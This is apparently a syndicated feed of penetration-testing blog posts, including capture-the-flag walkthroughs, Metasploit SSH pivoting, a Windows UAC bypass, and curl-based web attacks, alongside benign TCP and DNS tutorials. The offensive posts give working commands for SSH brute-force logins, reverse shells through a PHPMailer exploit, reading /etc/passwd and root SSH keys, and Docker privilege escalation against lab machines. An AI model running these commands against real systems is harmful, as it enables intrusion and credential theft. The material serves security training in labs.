News from 'Hacking Articles'

Syndicate content
Raj Chandel's Blog
Updated: 15 hours 9 min ago

SSH Pivoting using Meterpreter

Mon, 14/Aug/2017 - 22:00

If you are aware of SSH tunneling then you can easily understand SSH pivoting, if not then don’t worry read SSH tunneling from here.   

Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack.

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.0.109

msf auxiliary(ssh_login) > set username raj

msf auxiliary(ssh_login) > set password 123

msf auxiliary(ssh_login) > exploit

From given image you we can observe that command shell session 1 opened

Now convert command shell into meterpreter shell through following command

Session –u 1

From given image you can observe that Meterpreter session 2 opened

Sessions

 Hence if you will count then currently attacker has hold 2 sessions, 1st for command shell and 2nd for meterpreter shell of SSH server.

Check network interface using ifconfig command

From given image you can observe two network interface in victim’s system 1st for IP 192.168.0.109 through which attacker is connected and 2nd for IP 192.168.10.1 through which SSH client (targets) is connected.

Since attacker belongs to 192.168.0.1 interface and client belongs to 192.168.10.0 interface therefore it is not possible to directly make attack on client network until unless the attacker acquires same network connection. In order to achieve 192.168.10.0 network attacker need run the post exploitation “autoroute”.

This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

msf > use post/multi/manage/autoroute 

msf post(autoroute) > set subnet 192.168.10.0

msf post(autoroute) > set session 2

msf post(autoroute) > exploit

This time we are exploiting SSH ignite (local client) therefore we are going to use same module for it that had used above for SSH raj, only need to change information inside exploit.

 msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.10.2

msf auxiliary(ssh_login) > set username ignite

msf auxiliary(ssh_login) > set password 1234

msf auxiliary(ssh_login) > exploit

 From given image you can see another command shell 3 opened, if you will count then total attack has hold 3 sessions, two for SSH server and one for SSH client.

 Sessions

  1. Command shell for SSH raj (192.168.0.109:22)
  2. Meterpreter shell for SSH raj (192.168.0.109)
  3. Command shell for SSH ignite (192.168.10.2:22)

Sessions 3

Now attacker is command shell of SSH ignite (client), let’s verify through network configuration.

Ifconfig

From given you can observe the network IP is 192.168.10.2

 Pivoting is Dangerous but enjoyable network attack 

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post SSH Pivoting using Meterpreter appeared first on Hacking Articles.

Categories: Cyber India

Hack the Moria: 1.1 (CTF Challenge)

Sun, 13/Aug/2017 - 14:53

Today I found a Vulnerable Lab based on the world of Lords of The Rings. So get on your Gandalf mode to solve this fun Vulnerable Lab Moria 1.2., we are going to download the VM Machine from here.

The credit for developing this VM machine is goes to Abatchy. It is a Boot2Root Lab.

Note: According to author you don’t need LOTR knowledge to hack this VM, but trust me, you need it.

Let’s Breach!!!

As always, Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.125 but you will have to find your own)

netdiscover

Use nmap command for port enumeration

nmap -sV 192.168.1.125

As you can see port 21 for ftp, port 22 for ssh and port 80 for http are open, so let’s explore port 80 through Browser.

After Browsing I found this Image with label Gates of Moria. I decided to do a bit research on the text written in given below the image. After searching through some wiki pages, I found its translation “Say Friend and Enter” where Mellon means Friend.

So Friend or Mellon must be a password. Keeping that in mind let’s move forward. Here I decided to scan the target directory using dirb scan. Now open the terminal in Kali Linux and type the following command:

dirb http://192.168.1.125/

From scanning result I choose the highlighted directory for further enumeration.

http://192.168.1.125/w/

So I opened this directory in the Browser and found another directory inside it i.e h/

On opening it I got another directory and so on until it completes path /w/h/i/s/p/e/r. Here we find the last directory named the_abyss/

On opening the_abyss, I got some text as shown in image. Fundin:”That human will never save us!”

Tried to look at source code but nothing then again try to refresh the page and then found this above given text get changed into another the text, again refresh the page again text change into “Knock Knock”.

Firstly seemed weird but then I refreshed again and it changed again hence text were changing randomly when I refresh the web page.

So I decided to do a dirb scan but it gave no result, so I did an extension dirb scan as shown.

dirb http://192.168.1.125/w/h/i/s/p/e/r/the_abyss/ -X .txt .img .html

This dirb scanner scans for a particular extenstion which is specified like .txt or .img etc.

Aha! Found a file namedrandom.txt.

So I opened it through the browser and found all the text that was coming on refreshing page in a single webpage as shown.

This text contains a lot of names like Balin, Oin, Ori, Fundin, Nain, Eru, Balrog, I noted them because they might be usernames or passwords.

Now I tried to connect with ftp port.

ftp 192.168.1.125

 

It greeted with Welcome Balrog

And I knew it must be the username because it was in the random.txt too but for password, I had tried multiple names which I found previously and then I remembered the text form the image, “Say friend and enter”. I entered Friend but login failed then tried with Mellow and got login successfully.

Therefore for FTP Login give following credential:

Username: Balrog

Password: Mellow

NOTE: – If you get an error, restart VM and also try multiple times with the above username and password.

After login, I tried pwd command and got the path to be /prision. I looked around it in hope of a flag but didn’t found any hint for flag. Then I found var folder and move inside inside.

Then I got to /var/www/html here I found this folder QlVraKW4fbIkXau9zkAPNGzviT3UKntl

When opened it in browser I found a table having two columns for Prisoner’s name and Passkey as shown in given image.

As always, I searched the source code for some hint. From View Source page I found the “salt” which can be used to decrypt the MD5 Password.

After trying different kinds of formats to decrypt above MD5 password I created a file with name and passkey and salt in this format 

Prisoner’s Name:Passkey$Salt

Name it whatever you want (Here I named it passwords and saved it on my kali Desktop).

Now we will run John The Ripper, Dynamic -6 on this file to decrypt it. By using this command in my kali terminal

john–form=dynamic_6 /root/Desktop/lol

These look like login credentials.

After trying all user credentials decrypted to login in ssh, I got success with

SSH Login

Username :Ori

Password :spanky

Now login into ssh using above credential

ssh Ori@192.168.1.125

Here we got the bash shell. Now I tried multiple commands in search of a flag in ls-al, I found a poem.txt file, which contains a poem. But it didn’t find any flag inside it.

Then I looked into.ssh/ directory And found know_hosts file, and id_rsa file which contained the private key and then open these file one by one,

cat id_rsa

Copy the entire text found inside id_rsa in a text file and save as id_rsa.

Now open another file known_host with cat command, here you will find host is “127.0.0.1”, let use these information for ssh login for root user.

ssh -i id_rsa root@127.0.0.1

I got the ROOT.

But let’s finish it properly.  So I tried ls -la scan to get a flag. And I found a flag.txt inside flag.txt I got the Final Message “All that is gold does not glitter”.

It was an adventurous and learning experience and I would like to thank Abatchy for creating such a fun VM Lab.

Author: Pavandeep Singh is An Ethical HackerCyber Security Expert, Penetration Tester, India. Contact here

The post Hack the Moria: 1.1 (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

Bypass UAC in Windows 10 using bypass_comhijack Exploit

Sat, 12/Aug/2017 - 21:50

In this article we are going to bypass User Access Control (UAC) in targeted system. It is the post exploitation; hence attacker must exploit target system at first then escalate UAC Protection Bypass via COM Handler Hijack.

Let’s start!!

 Attacker: Kali Linux

Target: window 10

Firstly exploit the target to receive meterpreter session of victim’s system. Once you get the meterpreter session 1 then type following command to check system authority and privileges.

getuid

getprivs

 From given image you can perceive that attacker is inside the meterpreter shell of victim’s system but don’t have system/admin authorities and privileges. Hence here we need to bypass UAC Protection of targeted system.

To perform this attack you need to manually add bypass_comhijack exploit inside metasploit framework.

Copy the entire content of “bypass_comhijack” from here and past it in a text document, now save as bypass_comhijack.rb inside the following path:

usr>share>metasploit_framework>modules>exploit>windows>local

 From given image you can observe bypass_comhijack.rb exploit has been saved, as attacker has his meterpreter session therefore now he can use this exploit in order to bypass UAC protection.

This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entire are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation.

use exploit/windows/local/bypassuac_comhijack

Msf exploit (bypassuac_comhijack) > set payload window/x64/meterpreter/reverse_tcp

Msf exploit (bypassuac_comhijack) > set session 2

Msf exploit (bypassuac_comhijack) > set lhost 192.168.0.20

Msf exploit (bypassuac_comhijack) > exploit

From given image you can observe that meterpreter session 3 opened, now type following command to determine system authority privileges.

getsystem

getprivs

 Wonderful!! Attacker got system/admin authorities and privileges.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Bypass UAC in Windows 10 using bypass_comhijack Exploit appeared first on Hacking Articles.

Categories: Cyber India

Hack the DonkeyDocker (CTF Challenge)

Fri, 11/Aug/2017 - 16:34

Today we are going to solve a fun Vulnerable Lab DonkeyDocker, download this VM Machine from here.

The credit for developing this VM machine is goes to Dennis Herrmann who has hide 3 flag inside this lab as a challenge for hackers.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.120 but you will have to find your own)

netdiscover

Use nmap command for port enumeration

nmap -sV 192.168.1.120

As you can see port 22 for ssh and 80 for http are open, so let’s explore port 80 through Browser

After browsing I found three tabs Home, About and Contact but didn’t found any clue for next step, then I decided to scan the target directory using dirb scan.

Now open the terminal in kali Linux and type following command:

dirb http://192.168.1.120

From scanning result I choose the highlighted directory http://192.168.1.120/mailer/examples/ for further enumeration.

Here, we get to know that PHPMailer is running on targeted system. Let try to find out its version.

So After browsing a bit about PHP Mailer, we came know that how to get the version of phpmailer

http://192.168.1.120/mailer/VERSION

We got the version of PHPMailer i.e. 5.2.16.

From Google we came to known that PHPMailer 5.2.16 is vulnerable to Remote Code Execution (python) {CVE-2016-10033}. Exploiting PHPMail with back connection (reverse shell) from the target. You can download this exploit from here.

After Downloading the Python File and make following changes:

  1. Open the file and add “# coding: utf-8” at the beginning.
  2. Set target = ‘http://192.168.1.120/contact’ (victim IP), it is the location where backdoor.php get uploaded in victim’s machine automatically.
  3. Give attacker IP : 192.168.1.101(kali Linux IP) inside payload code
  4. After making above changes save it.

Now start natcat at port same port on which the payload is bind i.e. 4444 for establishing reverse connection with target.

nc -lvp 4444

Before you run the python script, type following command in a new terminal which will install the exploit dependency.

pip2 install requests_toolbelt

Now run the script in order to exploit the target as shown in given image.

python 40974.py

Move back natcat shell and here you will find that it is connected to victim but not able to access proper shell of victim system therefore type given command in order to access victim shell properly as shown in image.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Once you got the victim shell type following commands for finding hidden flag.

ls

cat main.sh

Here we found user smith which is a directory has flag.txt let approach toward this directory.

cd home

ls

While again opening smith directory, we got Permission denied.

Then we used su smith to instead of sudo, because sudo is not accessible in this shell

su smith

For Password we tried “smith” and successfully get smith’s shell

Now we are inside smith shell, type following command to get the flag

ls

cd /home/smith

ls

flag.txt

cat flag.xt

Great!! Successfully capture 1st flag

Moreover if you notice the given image you will find next clue “I like 1984 written by Geoge ORWELL” it could be possible that it might be a user name having 2nd flag inside it.

Type following command to view all directory list

ls -al

We got the authorized keys, id_ed25519 and id_ed25519.pub in SSH directory, lets open these key one by one

cat authorized_keys

cat id_ed25519

cat id_ed25519.pub

In id_ed25519 we get the Openssh Private Key and this key is authorized for orwell@donkeydocker. Now copy the private key and past inside the text file.

We have Save this Private Key in a file as id_rsa as shown in given below image.

Now using ssh login by

Ssh –I id_rsa orwell@192.168.1.120

Here you will be greeted by the Donkey Docker Shell. Now check directory list for 2nd flag

Ls

Flag.txt

Cat flag.xt

 Nice!! Successfully got 2nd shell

Now for the last flag we tried and a lot of different tricks but nothing seems to get through and you can read an article from here, which help in finding the 3rd flag.

Type following command

docker run –v /root:/hack –t debian:jessie /bin/sh -c ‘ls -al /hack’

This created a user named Jessie and gave it root access through privilege escalation; check all directory lists inside it, here we get the flag.txt file.

Now to open this file we will use the previous command just with slight modification as shown:

docker run -v /root:/hack -t debian:jessie /bin/sh -c ‘cat /hack/flag.txt’  

Awesome we got 3rd flag also.

Author: Pavandeep Singh is An Ethical HackerCyber Security Expert, Penetration Tester, India. Contact here

The post Hack the DonkeyDocker (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

Analysing TCP Headers using Wireshark

Fri, 11/Aug/2017 - 15:04

From Wikipedia

TCP is used mostly by various applications available by internet, including the World Wide Web (WWW), E-mail, File Transfer Protocol, Secure Shell, peer file, and streaming media applications.

3 Way Handshakes

 The handshaking process usually takes place in order to establish rules for communication when a computer sets about communicating with a foreign device. When a computer communicates with another device like a modem, printer, or network server, it needs to handshake with it to establish a connection.

  • Client sends a TCP packet to the server with the SYN flag
  • Server responds to the client request with the SYN and ACK flags set.
  • Client completes the connection by sending a packet with the ACK flag set
Structure of TCP segment

 Transmission Control Protocol accepts data from a data stream, splits it into chunks, and adds a TCP header creating a TCP segment. A TCP segment only carries the sequence number of the first byte in the segment.

A TCP segment consists of a segment header and a data section. The TCP header contains 10 mandatory fields, and an optional extension field.

Source Port The 16-bit source port number, Identifies the sending port. Destination Port The 16-bit destination port number. Identifies the receiving port Sequence Number The sequence number of the first data byte in this segment. If the SYN control bit is set, the sequence number is the initial sequence number (n) and the first data byte is n+1. Acknowledgment Number If the ACK control bit is set, this field contains the value of the next sequence number that the receiver is expecting to receive. Data Offset The number of 32-bit words in the TCP header. It indicates where the data begins. Reserved Six bits reserved for future use; must be zero. Flags CWR, ECE, URG, ACK, PSH, RST, SYN, FIN Window Used in ACK segments. It specifies the number of data bytes, beginning with the one indicated in the acknowledgment number field that the receiver (the sender of this segment) is willing to accept. Checksum The 16-bit one’s complement of the one’s complement sum of all 16-bit words in a pseudo-header, the TCP header, and the TCP data. While computing the checksum, the checksum field itself is considered zero. Urgent Pointer Points to the first data octet following the urgent data.

Only significant when the URG control bit is set. Options Just as in the case of IP datagram options, options can be

either:

– A single byte containing the option number

– A variable length option in the following format Padding The TCP header padding is used to ensure that the TCP header ends and data begins on a 32 bit boundary.  The padding is composed of zeros.

 

  Different Types of TCP flags

TCP flags are used within TCP header as these are control bits that specify particular connection states or information about how a packet should be set. TCP flag field in a TCP segment will help us to understand the function and purpose of any packet in the connection. 

List of flags

  Description CWR Congestion Window Reduced (CWR) flag is set by the sending host to shows that it received a TCP segment with the ECE flag set ECE  ECN-Echo indicate that the TCP peer is ECN capable during 3-way handshake URG Indicates that the urgent pointer field is significant in this segment. ACK Indicates that the acknowledgment field is significant in this segment. PSH Push function to transfer data RST Resets the connection. SYN Synchronizes the sequence numbers. FIN No more data from sender. Analysis TCP packet using Wireshark

As you have read above “structure of TCP segment” and its “field” now we are going to elaborate it with the help of Wireshark. We hope that reader must be aware with the 7 layers of OSI model, so that TCP packet analysis will be more cleared.

From given below image you can see we had sniffed the network in order to capture TCP packets, it is clearly showing: time, source IP, destination IP, Protocol, length of packets and information.

As I had told above if you are aware of OSI model then you can see it has shown three layers of OSI: layer 2 (Ethernet), layer 3 (Internet Protocol version 4), layer 4 (Transmission Control Protocol (TCP)).

Now let’s analysis layer 4 and compare above theory with given below image. You can see I have underline all fields of TCP segment. Now read following information of TCP packets.

Source Port: 58302

Destination Port: 80

Sequence number: 0

Acknowledgment number: 0

Flags: SYN

Window size value: 29200

Checksum: unverified

Urgent Pointer: 0

Option: 20 bytes

The SYN (synchronize) flag is the TCP packet flag which is set to start a TCP connection for “3 way handshakes” and  the Sequence number and Acknowledgment number are 0.

From given below image you can see expanded field for flags is showing only 1 flag SYN is set between source port and Destination port rest flags are not set at this moment. Hence the control bits will get 1 for that sets flag in TCP connection otherwise it remains zero.

Packets setting the SYN flag can also be used to perform a SYN flood and a SYN scan.

As I had explain above in three way handshakes first client request with SYN flag after that Server responds to the client request with the SYN and ACK flags set, and from following information we observe same sequence of packet transferring between client and server and as well as the Sequence number is 0 & Acknowledgment number is 1.

Source Port: 58302

Destination Port: 80

Sequence number: 0

Acknowledgment number: 1

Flags: SYN, ACK

Window size value: 42408

Checksum: unverified

Urgent Pointer: 0

Option: 12 bytes

From expanded field of flags you can observe that this time 2 flags SYN and ACK are set rest are remain unset or say zero and control bit is set 1-1 for both flag. This is the 2nd step for “3 way handshake”.

From following information we found this time the Sequence number & Acknowledgment number are 1 and Client completes the connection by sending a packet with the ACK flag set. Now TCP connection has be established between client and server.

Source Port: 58302

Destination Port: 80

Sequence number: 1

Acknowledgment number: 1

Flags: ACK

Window size value: 229

Checksum: unverified

Urgent Pointer: 0

Option: 12 bytes

From given below image you can observer that the control bit is 1 for acknowledgement flag  and this is the third step required for “3 way handshake” between source port and destination port.

Once TCP 3 ways handshake connection established then data can transfer between client and server as you can see from last image it has shown 7th layer for Hypertext Transfer Protocol also for data transferring.

Source Port: 58302

Destination Port: 80

Sequence number: 1

Acknowledgment number: 1

Flags: PUSH, ACK

Window size value: 229

Checksum: unverified

Urgent Pointer: 0

Option: 12bytes

The use of push function and the PUSH flag is to move forward the data from the sending user to the receiving user. In order to permit applications to read from and write to this socket at any time, buffers are implemented on both sides of a TCP connection.

Here you can observe that control bit set to 1 for PUSH and ACK flag as a result a new layer get open for data transferring between sender application and receiver application.

Now when transfer data packet explored we found http header details like:

Host: google.com

User-Agent: Mozilla/5.0

At last the different types of cookie that you can observe in given below image.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Analysing TCP Headers using Wireshark appeared first on Hacking Articles.

Categories: Cyber India

Web Application Penetration Testing with curl

Thu, 10/Aug/2017 - 21:49

curl is a computer software project providing a library and command-line tool for transferring data using various protocols.

CURL is simply awesome because of the following reasons…

  • CURL is an easy to use command line tool to send and receive files, and it supports almost all major protocols(DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS,  LDAP,  LDAPS,  POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, TELNET and TFTP) in use.
  • Can be used inside your shell scripts with ease
  • Supports features like pause and resume of downloads
  • It has around 120 command line options for various tasks
  • It runs on all major operating systems(More than 40+ Operating systems)
  • Supports cookies, forms and SSL
  • Both curl command line tool and libcurl library are open source, so they can be used in any of your programs
  • It supports configuration files
  • Multiple upload with a single command
  • Progress bar, rate limiting, and download time details
  • IPV6 Support

CURL comes by default installed in most of the distributions. If you do not have curl tool installed, then it’s a single apt-get (apt-get install curl) or yum (yum install curl) command.

For this tutorial we had used “web for pentester” to support curl command. As you known this lab is vulnerable against many website based attack therefore we had choose curl as our weapon for attack.

Let’s begin!!

Command Injection

You must be aware command injection vulnerability which allows to execute OS based arbitrary command, type following command to check directory list in targeted system:

Curl “http://192.168.0.16/commandexec/example1.php?127.0.0.1;ls”

From given below image you can observe that it execute ping command as well as ls command, as result we found three PHP files in this directory.

Download File from URL

Curl is also use for download the data from any website or host machine, following command will download putty.exe file from website.

Curl -O https://the.earth.li/~sgtatham/putty/latest/putty.exe

HTTP Headers

Curl is use for identify HTTP method which helps in http verb tempering, type following command:

Curl -v -X http://www.google.com

From given below image you can perceive that only GET and HEAD methods are allowed on Google.

File Inclusion

This vulnerability allows an attacker to include a file on the web server, use following curl command to exploit it

Curl http://192.168.0.16/fileincl/example.php?page=etc/passwd

Hence you can observe that we found data from inside etc/passwd

HTTP Authentication

HTTP Authentication is use to inform the server user’s username and password so that it can authenticate that you’re allowed to send the request you’re sending. Curl is use HTTP Basic authentication. Now type following command which required username and password for login into website through curl.

Curl -data “uname=test&pass=test” http://testphp.vulnweb.com/userinfo.php

If you will notice given below image carefully you can observe that following code contains user information inside the table such as Email-ID, phone number, address and etc.

File Upload

Upload option inside in website allow uploading of any image or text on that particular website, for example uploading any image on facebook.  Use curl command to upload the putty.exe file on targeted system.

Curl -F ‘image=@/root/Desktop/putty.exe’ http://192.168.0.16/upload/example1.php

Great! You can read the highlighted text is indicating towards directory “/upload/images/putty.exe” where file has been successfully uploaded.

Open above given directory in browser as 192.168.0.16/upload/images/

 Awesome! From given below you can see putty.exe is uploaded

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Web Application Penetration Testing with curl appeared first on Hacking Articles.

Categories: Cyber India

Hack the d0not5top VM (CTF Challenge)

Thu, 10/Aug/2017 - 13:51

This time we are going to solve a fun Vulnerable Lab d0not5top 1.2. To do so we are going to download the VM Machine from here.

The credit for developing this VM machine is goes to 3mrgnc3 who has hide 7 flag inside this lab as a challenge for hackers.

Let’s Breach!!!

As always, Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.113 but you will have to find your own)

netdiscover

Next we run nmap

nmap -sV 192.168.1.113

Now, visit the IP in the Browser.

Since we I didn’t found something interesting when explore its IP in browser therefore now I am going to scan the Web Content by using dirb in kali linux.

dirb http://192.168.1.113

As you can observe from above image I had highlighted a URL which indicates toward the control panel of website lets open 192.168.1.113/control in the Browser. Yes it is DNS control panel but I didn’t found any clue for 1st flag on this web page.

After that move towards its view source page and notice FL46_1 which indicate it is the 1st flag.

Wonderful!! Successfully found 1st flag

From the scanning result of dirb we found so many web directories in this machine therefore further I choose 192.168.1.113/control/js Directory. In this I found a File README.MadBro. It will open as shown below.

 Now here we found a Binary code which is to be converted into Decimal. On conversion you will find FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2

Great!! Successfully get 2nd Flag.

Now, for third flag, we will use netcat very verbrose mode on port 25 which hosts smtpd service (This can be found by doing an aggressive nmap scan on the IP)

nc -vv 192.168.1.113 25

Here we found a Hexadecimal code which is to be converted in Text.

Great!! Successfully get 3nd Flag also.

On the url on which we found Second Flag, There is an instruction written in Leet, It reads: M4K3 5UR3 2 S3TUP YOUR /3TC/HO5TS N3XT TIM3 L0053R… 1T’5 D0Not5topMe.ctf!!! So we will go to /etc/hosts and add an entry as shown in given image.

Now open donot5topme.ctf in the browser as shown and Click on Register given at the end of web page.

As you can observe that we didn’t found any clue on this web page therefore open view source page.

At View Page Source, here we found this link as shown in highlighted text.

Such kind of encoded web page is open then I search in google related to this encoding. It is known as brain fuck encoding.

So we will decrypt it. Here we got the FL46_4

Successfully found 4th flag

Now move back to the d0not5topme.ctf. Now we will click on Register and Then on I agree to these terms and we will get to Registration Page. Here we click on Board Administration, which opens a prompt which asks for the client to open mailto link, here I choose Gmail.

Here I found another ctf “Megusta@G4M35.ctf

Now let’s add G4M35.ctf into /etc/hosts as we did before and click on Save.

When I open this domain in browser, I got a game to play, although you can get the next clue by playing too, but I  thought of a more technical approach and open this webpage and with Inspect Element. Now select the Debugger Tab. Here I found game.js and inside the Game_Over script I found the next clue as “/H3X6L4m3

Now open the complete link “g4m35.ctf/H3X6L4m3” on this domain it gave me another game.

Again we can play and discover the next clue/flag. But we went to get a bit technical approach and ran a dirb command to look after its directories.

dirb http://g4m35.ctf/H3x6L64m3/ /usr/share/wordlists/dirb/big.txt

From given result I had highlighted http://g4m35.ctf/H3x6L64m3/textures/ for further enumeration.

Now I have opened this textures directory in the browser, here I open the skybox directory and then the dawnclouds directory and found the nz.jpg file as shown.

Now open this image and got the octal code.

When decode this code I found FL46_5

I had Captured 5th flag also!!

Now get back to the second game http://g4m35.ctf/H3x6L64m3 and open with Inspect Element. Now select the Debugger Tab. Here I found Gameplay.js and got another domain “t3rmln4l.ctf” as shown below.

Now let’s add t3rmln4l.ctf into /etc/hosts as we did before and click on Save.

Now as before, while opening this domain in browser, I got a Terminal which asks for password. After trying a bunch of commands, I found grep* runs on this terminal and for authentication I entered the name of domain as password i.e t3rm1a4l.ctf and found another domain “M36u574.ctf”.

Now let’s add M36u574.ctf also into /etc/hosts as we did before and click on Save.

Now as before, you will open this domain in browser, you will get a slideshow of Megusta images. Out of different images I have downloaded the kingmegusta.jpg.

 Now we will run exiftool on this image, here I got some code in Comment as shown below.

Now convert the code to Text and found following code as shown in image. Copy this code it is base64 encoded.

Then I had created a text file on /root/Desktop/ name anything you want and Paste the above decoded text in this file.

Now run John The Ripper, using this file as shown

john –wordlist=/usr/share/wordlists/rockyou.txt donotstop

Here I found a user MeGustaKing and Password ********** (10 times *).

Now using this username and password combination we will login into the ssh. Here we get a code and another username and password combination i.e. burtieo:Lets you update your FunNotes and more! But first let’s decode that highlighted code.

Copy and paste above code inside it. It is in base64 encryption, after decrypting the code we found that it is md5 encoded.

Great! It is the 6th Flag.

As mentioned above in the previous ssh login we got this username burtieo and its password is the text written above it i.e. Lets you update your FunNotes and more!

Now let’s login in ssh using combination

Username : burtieo and Password : Lets you update your FunNotes and more!

This opens rbash shell and rbash shell restricts some of the features of bash shell.

So, firstly run following command

suedoh –l

And then we run the command

suedoh /usr/bin/wmstrt

Using nmap command I found up the port 10000 open.

But this port only remains open for 20 seconds, we can make it stay open for long using “for loop” as shown.

Now let’s run metasploit and use the exploit named file_disclosure

 msf> use auxiliary/admin/webmin/file_disclosure

msf> auxiliary (file_disclosure) > set lhost 192.168.1.113

msf> auxiliary (file_disclosure) > set ssl true

msf> auxiliary (file_disclosure) > set rpath /root/.ssh/id_rsa

msf> auxiliary (file_disclosure) > exploit

I found the RSA Private Key as shown.

 

Now Copy and Paste this Private Key in a file and name it id_rsa and then Run John The Ripper.

ssh2john id_rsa> ignite

john –wordlist:/usr/share/wordlists/rockyou.txt ignite

This has given the root password .i.e. “gustateamo

Now I have removed permissions of id_rsa by chmod 700 and login into ssh as root with password gustateamo as shown below.

Now type following command

ls

You can observe from given image it consist two file let open one of them

cat L45T_fl46.pl

Here it gave the message to use L45T_fl46.pl

Now use netcat command to establish connection with target through port 1234.

nc -lp 1234 –vv

Now in D0Not5top terminal we will open file L45T_fl46.pl with IP 192.168.0.7 (Kali Linux IP) as given below:

./ L45T_fl46.pl 192.168.0.7 1234

On attacker system it will you will found get netcat connect with targeted system. The highlighted text is indicating toward FL46_7

Congratulations!! It is the 7th Flag.

Solving this lab was a fun and learning experience.

Author: Rajat Chikara is An Ethical HackerCyber Security Expert, Penetration Tester, India.

The post Hack the d0not5top VM (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

How to Perform Remote Tunneling

Thu, 03/Aug/2017 - 21:56

Hello friends! Previously we had discussed on Dynamic tunneling and Local tunneling and today we are going to discuss Remote tunneling.

Remote tunneling is functional when a client machine wants to access a remote system which is outward from its network.

 Example: Your personal laptop (at home) is connected with your office server; currently you are working on a client system (at office) which is connected to office server. Now if you want to connect your client system with laptop in order to read some document then there should be a remote tunnel between them for communication.

Let’s Begin!!

Objective:  To establish HTTP connection between remote PC and client server of different network.

Here I have set my own lab which consist three systems in following network:

SSH server (two Ethernet interface) 

IP 192.168.0.116 connected to remote system 192.168.0.100

IP 192.168.10.1 connected to local network system 192.168.10.2

Ubuntu client (local network system) holds IP 192.168.10.2

Remote system (outside network) holds IP 192.168.0.100

Given image below is describing the network configuration for SSH server where it is showing two IP 192.168.0.116 and another 192.168.10.1 as explain above.

Another image given below is describing network configuration for ubuntu client which is showing IP 192.168.10.2

Another image given below is describing network configuration for Remote Desktop whose IP is 192.168.0.100

Since in this tutorial we are showing HTTP tunneling and this service is running on port 80 of Xampp server (at localhost).

From given image you can observe that the wordpress website is running on port 80.

At SSH server we have successfully browse wordpress website using URL http://192.168.0.100/index.html and get connected with remote desktop, since they belongs to same network hence they both can access each other network for communication.

Similarly we had tried connect remote Desktop with ubuntu client through URL http://192.168.0.100/index.html but get failed to browse wordpress website. Since they both belong to different network hence connection forbidden here.

Now try to establish link between remote desktop and ubuntu client using putty.

Use putty to connect SSH server (192.168.0.116) via port 22 and follow given below steps.

Then go with option SSH >Tunnel specified in the left column of category and follow given below steps:

  1. Mark the check box for “Local ports accept connections from other hosts
  2. Give new port forwarded as 7000 and connection type as remote.
  3. Destination address as 127. 0.0.1:80 for establishing connection and then click on ADD at last
  4. Click on open when all things are set.

 

This will first establish the connection between remote pc and SSH server which will act like a link between remote desktop and ubuntu client throughout communication.

Now open the browser inside ubuntu client and again try to connect with remote desktop using URL http://192.168.0.116:7000/index.html this will browse wordpress website which was running on localhost of remote desktop via SSH server on port 7000.

Hence we had successfully connected with remote desktop through ubuntu client.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post How to Perform Remote Tunneling appeared first on Hacking Articles.

Categories: Cyber India

Setup DNS Penetration Testing Lab on Windows Server 2012

Wed, 02/Aug/2017 - 22:33

From Wikipedia

Domain Name System is used for name translation into IP address or you can say that it is used for name resolution.

This name is only for the benefit of the human. It is translated into IP addresses to reach the destination. The translation process of a name is called name resolution.

Name resolution starts from right to left. There is another “.” after com but it is hidden. This is called root level domain. Winner request is sent to the root domain for translation it forwards this request to com domain which is called Top Level Domain. Com passes the request to yahoo domain which is called 2ndlevel domain .Yahoo then sends the request to www which is called host name.

Structure of the DNS is distributed over the internet. It means that the name resolution task is not assigned to only computer rather it is distributed over the internet.

Steps to Install DNS server

Configure Static IP setting of your server; here we had assigned 192.168.1.104 IP to our machine moreover we had assign server IP also as preferred DNS server.

We have to open Server Manager and then click on Add Roles and Features in order to install role services and features. A new window will come up on screen. Now click on next as shown below in given image.

Select installation type “role based or feature based installation” which is also select as default option and then click on next for further step.

Select the desire server from server pool for configuration of DNS server. From given below image you can observe that  from inside pool 1 computer is found with IP 192.168.1.104 that has been selected as server, now click on next.

Select DNS server checkbox as role to install it on selected server and click on Next.

Now Just Click on Next after reading brief description of DNS.

To install selected role and feature on selected server click on install.

DNS server installation process begins which may takes few minute for installation, at last click on close once the installation has been completed.

This is all about DNS installation now in next step we will configure DNS server.

 Zone

Database of DNS is called zone or partition of Domain Name Space represented by Domain Name is called Zone. When you click on zone then you will see two zones one is Forward Lookup Zone and Reverse Lookup Zone.

Forward Lookup Zone sends name and get IP address of the computer.

While Reverse Lookup Zone sends IP address of the computer then why we need name of the computer. The answer is that if firewall is installed on the computer then firewall stop or allow traffic on the basis of name that is why reverse lookup zone is used to convert IP address in the name.

Steps to create a Forward Lookup zone:

